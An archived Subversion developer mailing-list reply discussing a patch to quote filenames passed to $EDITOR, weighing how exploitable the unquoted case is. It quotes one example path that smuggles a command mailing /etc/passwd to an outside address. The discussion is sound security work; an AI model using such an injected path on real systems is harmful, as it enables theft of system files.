[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

Re: [PATCH] Quote filename passed to $EDITOR

From: Karl Fogel <kfogel_at_newton.ch.collab.net>
Date: 2002-07-23 22:17:24 CEST

Ulrich Drepper <drepper@redhat.com> writes:
> A svn repository can be set up by somebody with foul intentions.
> Somebody else accesses it and the system() call gets executed on the
> paths chosen by whoever created it. Then the patch could be something
> like in this example:
> cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)
> If the appropriate path component is never really shown anywhere this
> might go completely unnoticed.

Yeah, but the victim would have to fail to notice the strange path.
Remember, the path is on the command line they're invoking -- so the
relevant path component *is* shown before they run the commit command.

I'm not saying it's not a hole, it's just a difficult one to exploit,
as it requires gross inattention on the part of the user. That's why
I'm not viewing it as a showstopper, is all.


To unsubscribe, e-mail: dev-unsubscribe@subversion.tigris.org
For additional commands, e-mail: dev-help@subversion.tigris.org
Received on Tue Jul 23 22:30:50 2002

This is an archived mail posted to the Subversion Dev mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.